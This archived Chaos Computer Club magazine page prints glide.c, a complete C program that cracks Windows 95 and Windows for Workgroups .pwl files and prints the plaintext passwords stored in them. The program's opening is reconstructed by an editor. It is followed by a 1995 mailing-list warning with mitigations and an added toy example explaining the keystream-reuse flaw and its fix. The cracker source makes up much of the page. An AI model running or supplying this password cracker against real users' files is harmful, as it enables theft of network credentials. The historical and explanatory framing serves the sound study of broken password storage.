Chaos Computer Club 1997 February / cccd_beta_feb_97.iso / chaos / ds54 / ds54_15.txt (text file, 1997-02-28, 4KB, 173 lines)
Page 14, Issue 54
/* glide.c (Frank Stevenson's .pwl cracker) as printed from "cracked=size-0x0208;"
   onward. The includes, globals, declarations and file-reading prelude up to
   that line are NOT on this page; they are reconstructed here so the fragment
   compiles. OCR damage in the printed part has been repaired. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

unsigned char Data[100001];     /* the .pwl file */
unsigned char keystream[1001];  /* recovered keystream */
int Rpoint[300];                /* start offset of each resource */
int Rall[300];                  /* resource allocation table */

int main(int argc, char *argv[])
{
  FILE *fd;
  int i, j, size, cracked, sizemask, maxr, rsz, pos;
  int ch;
  char *name;

  if (argc < 2) {
    printf("usage: glide filename (username)\n");
    exit(1);
  }

  /* read PWL file (reconstructed prelude) */
  fd = fopen(argv[1], "rb");
  if (fd == NULL) {
    printf("can't open file %s\n", argv[1]);
    exit(1);
  }
  size = 0;
  while ((ch = fgetc(fd)) != EOF && size < 100000) Data[size++] = (unsigned char)ch;
  fclose(fd);

  /* username: the file name unless given explicitly (reconstructed prelude) */
  name = argv[1];
  if (argc > 2) name = argv[2];
  printf("Username: %s\n", name);

  /* copy encrypted text into keystream */
  cracked = size - 0x0208;
  if (cracked < 0) cracked = 0;
  if (cracked > 1000) cracked = 1000;
  memcpy(keystream, Data + 0x208, cracked);

  /* generate 20 bytes of keystream: the uppercased username is known plaintext */
  for (i = 0; i < 20; i++) {
    ch = toupper((unsigned char)name[i]);
    if (ch == 0) break;
    if (ch == '.') break;
    keystream[i] ^= ch;
  }
  cracked = 20;

  /* find allocated resources */
  sizemask = keystream[0] + (keystream[1] << 8);
  printf("Sizemask: %04X\n", sizemask);

  for (i = 0; i < 256; i++) Rall[i] = 0;
  maxr = 0;
  for (i = 0x108; i < 0x208; i++) {
    if (Data[i] != 0xff) {
      Rall[Data[i]]++;
      if (Data[i] > maxr) maxr = Data[i];
    }
  }
  maxr = (((maxr / 16) + 1) * 16); /* resource pointer table size appears
                                      to be divisible by 16 */

  /* search after resources */
  Rpoint[0] = 0x0208 + 2 * maxr + 20 + 2; /* first resource */
  for (i = 0; i < maxr; i++) {
    /* find size of current resource */
    pos = Rpoint[i];
    rsz = Data[pos] + (Data[pos + 1] << 8);
    rsz ^= sizemask;
    printf("Analyzing block with size: %04x\t(%d:%d)\n", rsz, i, Rall[i]);
    if ((Rall[i] == 0) && (rsz != 0)) {
      printf("unused resource has nonzero size !!!\n");
      exit(0);
    }
    pos += rsz;

    /* Resources have a tendency to have the wrong size for some reason */
    /* check for correct size (the "pos + 3 < size" bound is added so a
       malformed file cannot run the scan past the buffer) */
    if (i < maxr - 1) {
      while (pos + 3 < size && Data[pos + 3] != keystream[1]) {
        printf(":(%02X)", Data[pos + 3]);
        pos += 2; /* very rude, may fail */
      }
    }
    pos += 2; /* include pointer in size */
    Rpoint[i + 1] = pos;
  }
  Rpoint[maxr] = size;

  /* insert table data into keystream: the pointer table is known plaintext too */
  for (i = 0; i <= maxr; i++) {
    keystream[20 + 2 * i] ^= Rpoint[i] & 0x00ff;
    keystream[21 + 2 * i] ^= (Rpoint[i] >> 8) & 0x00ff;
  }
  cracked += maxr * 2 + 2;

  printf("%d bytes of keystream recovered\n", cracked);

  /* decrypt resources: the same keystream is reused for every resource */
  for (i = 0; i < maxr; i++) {
    rsz = Rpoint[i + 1] - Rpoint[i];
    if (rsz > cracked) rsz = cracked;
    printf("Resource[%d] (%d)\n", i, rsz);
    for (j = 0; j < rsz; j++)
      printf("%c", Data[Rpoint[i] + j] ^ keystream[j]);
    printf("\n");
  }
  exit(0);
}
- --- end ---

Die Datenschleuder - Das wissenschaftliche Fachblatt für Datenreisende, Issue 54, page 15

From: samba-bugs@anu.edu.au
Subject: win95 and WfWg .pwl files cracked
Date: Tue, 5 Dec 1995 23:11:52 +1100

I have just tried Frank Stevenson's program for cracking .pwl files. It indeed works. With it I could obtain the plain text passwords from a Windows95 .pwl file or a windows for workgroups .pwl file in less than a second. I tried it on 3 different files. All were successfully decrypted.

This is very bad.

It means that anyone with access to a WfWg or Win95 box that has been used to login to a samba (or NT or OS/2 etc) server can take the .pwl files off the PC and use them to get valid passwords on the server.

Note that this is not directly a security hole in samba. It's a huge security hole in the way WfWg and Win95 store their passwords on disk. It equally affects networks which use NT and OS/2 server. It also affects people who just use other WfWg and Win95 machines as servers.

Also, if your WfWg and Win95 systems have not been patched to avoid the "cd .." bug and you export any shares then anyone who can attach to those shares can obtain your .pwl files. It doesn't matter what directory you are exporting.

What can you do about this?

Well, if you don't care about security then just do nothing :-)

Otherwise.

First of all, change your router rules to disable tcp139, udp137 and udp138 from entering your network from the Internet.

Secondly, disable your WfWG and Win95 boxes from saving passwords on disk when connecting to SMB servers. Can someone please post clear instructions on exactly how to do this? (preferably with how to make it permanent)

Thirdly, delete all the .pwl files on your WfWG and Win95 boxes.

There's probably more you should do. I only found out about this decryption program a few minutes ago. I imagine more advice will be forthcoming from other people on this list.

Andrew
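The listing above never touches the cipher key: it only needs the same keystream to cover every record in the file, so known plaintext (the uppercased username, the pointer table) hands over keystream that decrypts everything else. The following added example, which is not from the magazine or from Frank Stevenson's program, isolates that flaw with a constructed toy stream cipher (xorshift32, not the Windows cipher) and shows beside it the per-record nonce that closes it; record layout, sample strings and key are all constructed for the example.

```c
#include <stdint.h>
#include <string.h>

#define REC 16  /* record length in this toy; real .pwl resources vary */

/* Toy keystream generator (xorshift32) seeded from key and nonce. A
 * constructed stand-in for whatever cipher the .pwl file uses; the
 * flaw shown below does not depend on the generator. */
static void keystream(uint32_t key, uint32_t nonce, uint8_t *out, int n)
{
    uint32_t s = key ^ (nonce * 0x9E3779B9u);
    if (s == 0) s = 1;                 /* xorshift must not start at 0 */
    for (int i = 0; i < n; i++) {
        s ^= s << 13; s ^= s >> 17; s ^= s << 5;
        out[i] = (uint8_t)s;
    }
}

/* Encrypt record idx. reuse=1 reproduces the .pwl mistake: every record
 * is XORed with the keystream from offset 0. reuse=0 mixes the record
 * index in as a nonce, so each record gets its own keystream. */
static void encrypt_record(uint32_t key, int idx, int reuse,
                           const uint8_t *pt, uint8_t *ct)
{
    uint8_t ks[REC];
    keystream(key, reuse ? 0 : (uint32_t)idx, ks, REC);
    for (int i = 0; i < REC; i++) ct[i] = pt[i] ^ ks[i];
}

/* What glide.c does with the username: known plaintext of record 0 XOR
 * its ciphertext gives keystream bytes, which are then applied to
 * record 1. Returns 1 if record 1 comes out exactly, 0 otherwise.
 * The key itself is never learned. */
int recover_other_record(int reuse)
{
    static const uint8_t known[REC + 1]  = "ANDREW..........";  /* constructed */
    static const uint8_t secret[REC + 1] = "hunter2 passwrd!";  /* constructed */
    const uint32_t key = 0xC0FFEE11u;    /* constructed secret key */
    uint8_t ct0[REC], ct1[REC], ks[REC], got[REC];

    encrypt_record(key, 0, reuse, known, ct0);
    encrypt_record(key, 1, reuse, secret, ct1);
    for (int i = 0; i < REC; i++) ks[i]  = ct0[i] ^ known[i];
    for (int i = 0; i < REC; i++) got[i] = ct1[i] ^ ks[i];
    return memcmp(got, secret, REC) == 0;
}
```

recover_other_record(1) returns 1 (keystream reused, the second record falls out of the first), recover_other_record(0) returns 0 (per-record nonce, the known plaintext tells the attacker nothing about the other record).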